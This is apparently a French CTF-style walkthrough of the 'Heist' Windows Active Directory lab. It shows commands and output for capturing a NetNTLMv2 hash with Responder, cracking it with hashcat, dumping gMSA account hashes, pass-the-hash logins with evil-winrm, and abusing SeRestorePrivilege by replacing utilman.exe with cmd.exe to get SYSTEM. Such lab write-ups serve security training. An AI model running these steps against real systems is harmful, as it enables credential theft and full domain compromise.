Heist

activie directory responder gmsapasswordreader serestoreprivilege

Nom machine : Heist
Difficulté : Difficile
OS : Windows AD

Enumération

NMAP

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-03 05:08 EDT
Nmap scan report for 192.168.196.165
Host is up (0.034s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-09-03 09:09:02Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: heist.offsec0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: heist.offsec0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-09-03T09:09:44+00:00; +2s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: HEIST
|   NetBIOS_Domain_Name: HEIST
|   NetBIOS_Computer_Name: DC01
|   DNS_Domain_Name: heist.offsec
|   DNS_Computer_Name: DC01.heist.offsec
|   DNS_Tree_Name: heist.offsec
|   Product_Version: 10.0.17763
|_  System_Time: 2024-09-03T09:09:04+00:00
| ssl-cert: Subject: commonName=DC01.heist.offsec
| Not valid before: 2024-08-01T02:27:33
|_Not valid after:  2025-01-31T02:27:33
8080/tcp open  http          Werkzeug httpd 2.0.1 (Python 3.9.0)
|_http-server-header: Werkzeug/2.0.1 Python/3.9.0
|_http-title: Super Secure Web Browser
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

HTTP (8080)

Nous allons utiliser responder pour récupérer un hash NTLMv2

Local exploitation

┌──(kali㉿kali)-[~]
└─$ sudo responder -I tun0

[HTTP] NTLMv2 Client   : 192.168.196.165
[HTTP] NTLMv2 Username : HEIST\enox
[HTTP] NTLMv2 Hash     : enox::HEIST:7de7b95776227892:A51046D41C44ABD81DB64A88E8CB305A:0101000000000000AF7BC745E1FDDA019639D3C0D5DBF5CC0000000002000800490057004C004A0001001E00570049004E002D004D0037004E005A005700340037004E0053005300480004001400490057004C004A002E004C004F00430041004C0003003400570049004E002D004D0037004E005A005700340037004E005300530048002E00490057004C004A002E004C004F00430041004C0005001400490057004C004A002E004C004F00430041004C000800300030000000000000000000000000300000C4F51C6E9DB9499D59C386C317DB4FE1D9EF380289201E62A8474177A8845FCE0A001000000000000000000000000000000000000900260048005400540050002F003100390032002E003100360038002E00340035002E003200330037000000000000000000

Nous allons le cracker.

──(kali㉿kali)-[~]
└─$ echo "enox::HEIST:7de7b95776227892:A51046D41C44ABD81DB64A88E8CB305A:0101000000000000AF7BC745E1FDDA019639D3C0D5DBF5CC0000000002000800490057004C004A0001001E00570049004E002D004D0037004E005A005700340037004E0053005300480004001400490057004C004A002E004C004F00430041004C0003003400570049004E002D004D0037004E005A005700340037004E005300530048002E00490057004C004A002E004C004F00430041004C0005001400490057004C004A002E004C004F00430041004C000800300030000000000000000000000000300000C4F51C6E9DB9499D59C386C317DB4FE1D9EF380289201E62A8474177A8845FCE0A001000000000000000000000000000000000000900260048005400540050002F003100390032002E003100360038002E00340035002E003200330037000000000000000000" > hash.txt
                                                                
┌──(kali㉿kali)-[~]
└─$ hashcat -h | grep NT
   5500 | NetNTLMv1 / NetNTLMv1+ESS                                  | Network Protocol
  27000 | NetNTLMv1 / NetNTLMv1+ESS (NT)                             | Network Protocol
   5600 | NetNTLMv2                                                  | Network Protocol
  27100 | NetNTLMv2 (NT)                                             | Network Protocol
   1000 | NTLM                                                       | Operating System
                                                                
┌──(kali㉿kali)-[~]
└─$ hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 5.0+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 16.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: cpu-sandybridge-11th Gen Intel(R) Core(TM) i7-11700F @ 2.50GHz, 7852/15768 MB (2048 MB allocatable), 5MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 1 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

ENOX::HEIST:7de7b95776227892:a51046d41c44abd81db64a88e8cb305a:0101000000000000af7bc745e1fdda019639d3c0d5dbf5cc0000000002000800490057004c004a0001001e00570049004e002d004d0037004e005a005700340037004e0053005300480004001400490057004c004a002e004c004f00430041004c0003003400570049004e002d004d0037004e005a005700340037004e005300530048002e00490057004c004a002e004c004f00430041004c0005001400490057004c004a002e004c004f00430041004c000800300030000000000000000000000000300000c4f51c6e9db9499d59c386c317db4fe1d9ef380289201e62a8474177a8845fce0a001000000000000000000000000000000000000900260048005400540050002f003100390032002e003100360038002e00340035002e003200330037000000000000000000:california
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: ENOX::HEIST:7de7b95776227892:a51046d41c44abd81db64a...000000
Time.Started.....: Tue Sep  3 05:13:37 2024 (0 secs)
Time.Estimated...: Tue Sep  3 05:13:37 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  1359.5 kH/s (1.79ms) @ Accel:1024 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 5120/14344385 (0.04%)
Rejected.........: 0/5120 (0.00%)
Restore.Point....: 0/14344385 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: 123456 -> babygrl
Hardware.Mon.#1..: Util: 18%

Started: Tue Sep  3 05:13:36 2024
Stopped: Tue Sep  3 05:13:39 2024

enox:california

┌──(kali㉿kali)-[~/oscp/heist]
└─$ crackmapexec winrm 192.168.196.165 -u user.txt -p pass.txt
SMB         192.168.196.165 5985   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:heist.offsec)
HTTP        192.168.196.165 5985   DC01             [*] http://192.168.196.165:5985/wsman
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       192.168.196.165 5985   DC01             [+] heist.offsec\enox:california (Pwn3d!)

┌──(kali㉿kali)-[~/oscp/heist]
└─$ evil-winrm -i 192.168.196.165 -u enox -p california
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\enox\Documents> whoami
heist\enox

Elévation de privilège

Nous allons essayer de devenir svc_apache$

┌──(kali㉿kali)-[~/oscp/heist]
└─$ bloodhound-python -d heist.offsec -u enox -p california -c all -ns 192.168.196.165
INFO: Found AD domain: heist.offsec
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: [Errno Connection error (dc01.heist.offsec:88)] [Errno -2] Name or service not known
INFO: Connecting to LDAP server: dc01.heist.offsec
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.heist.offsec
INFO: Found 6 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.heist.offsec
INFO: Done in 00M 07S

Dans Shortest Paths To High Value Targets

L'user enox appartient au groupe Web Admin

Clic droit sur la flèche

*Evil-WinRM* PS C:\Users\enox\desktop\application> ./gmsapasswordreader.exe --accountname svc_apache$
Calculating hashes for Old Value
[*] Input username             : svc_apache$
[*] Input domain               : HEIST.OFFSEC
[*] Salt                       : HEIST.OFFSECsvc_apache$
[*]       rc4_hmac             : 4FC1682833B24CF2225248D67DF7E618
[*]       aes128_cts_hmac_sha1 : 056248716EB814ECEEA9BEF3EC864606
[*]       aes256_cts_hmac_sha1 : E5BCF79903496F24EA9D753F1EFC3146701B6ADF88A00B03E9EE73483DD73984
[*]       des_cbc_md5          : 4AB398EFD91523CE

Calculating hashes for Current Value
[*] Input username             : svc_apache$
[*] Input domain               : HEIST.OFFSEC
[*] Salt                       : HEIST.OFFSECsvc_apache$
[*]       rc4_hmac             : 31424E5B49C147E64854B47E50AA4C98
[*]       aes128_cts_hmac_sha1 : 409F1002404B512AC58B4BEB22013568
[*]       aes256_cts_hmac_sha1 : F133616850B2F938715388DFD581398A58C9AF9B45F329710A278EE3E9074395
[*]       des_cbc_md5          : 7564AE6407BADCC4

rc4_hmac nous intéresse ici.

┌──(kali㉿kali)-[~/oscp/heist]
└─$ evil-winrm -i 192.168.196.165 -u svc_apache$ -H '4FC1682833B24CF2225248D67DF7E618'
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_apache$\Documents>

Nous sommes bien connecter en tant que svc_apache$

*Evil-WinRM* PS C:\users\svc_apache$\documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

SeRestorePrivilege est intéressant, intuition confirmé par le contenu du dossier documents.

Nous allons activer le script powershell

*Evil-WinRM* PS C:\users\svc_apache$\documents> ./EnableSeRestorePrivilege.ps1
Debug:
	using System;
	using System.Diagnostics;
	using System.Runtime.InteropServices;
	using System.Security.Principal;

	[StructLayout(LayoutKind.Sequential, Pack = 1)]
	public struct TokPriv1Luid
	{
		public int Count;
		public long Luid;
		public int Attr;
	}

	public static class Advapi32
	{
		[DllImport("advapi32.dll", SetLastError=true)]
		public static extern bool OpenProcessToken(
			IntPtr ProcessHandle,
			int DesiredAccess,
			ref IntPtr TokenHandle);

		[DllImport("advapi32.dll", SetLastError=true)]
		public static extern bool LookupPrivilegeValue(
			string lpSystemName,
			string lpName,
			ref long lpLuid);

		[DllImport("advapi32.dll", SetLastError = true)]
		public static extern bool AdjustTokenPrivileges(
			IntPtr TokenHandle,
			bool DisableAllPrivileges,
			ref TokPriv1Luid NewState,
			int BufferLength,
			IntPtr PreviousState,
			IntPtr ReturnLength);

	}

	public static class Kernel32
	{
		[DllImport("kernel32.dll")]
		public static extern uint GetLastError();
	}
Debug: Current process handle: 1620
Debug: Calling OpenProcessToken()
Debug: Token handle: 2652
Debug: Calling LookupPrivilegeValue for SeRestorePrivilege
Debug: SeRestorePrivilege LUID value: 18
Debug: Calling AdjustTokenPrivileges
Debug: GetLastError returned: 0

Maintenant nous pouvons l'exploiter.

GitHub - gtworek/Priv2Admin: Exploitation paths allowing you to (mis)use the Windows Privileges to elevate your rights within the OS.GitHub

*Evil-WinRM* PS C:\Users\svc_apache$\Documents> mv C:\Windows\System32\utilman.exe C:\Windows\System32\utilman.old
*Evil-WinRM* PS C:\Users\svc_apache$\Documents> mv C:\Windows\System32\cmd.exe C:\Windows\System32\utilman.exe

┌──(kali㉿kali)-[~/oscp/heist]
└─$ rdesktop 192.168.196.165

Appuyer sur Win + u

Nous sommes nt authority \ system !

PrécédentG00g SuivantHelpdesk

Mis à jour il y a 1 an

hashtagEnumération

hashtagNMAP

hashtagHTTP (8080)

hashtagLocal exploitation

hashtagElévation de privilège

Enumération

NMAP

HTTP (8080)

Local exploitation

Elévation de privilège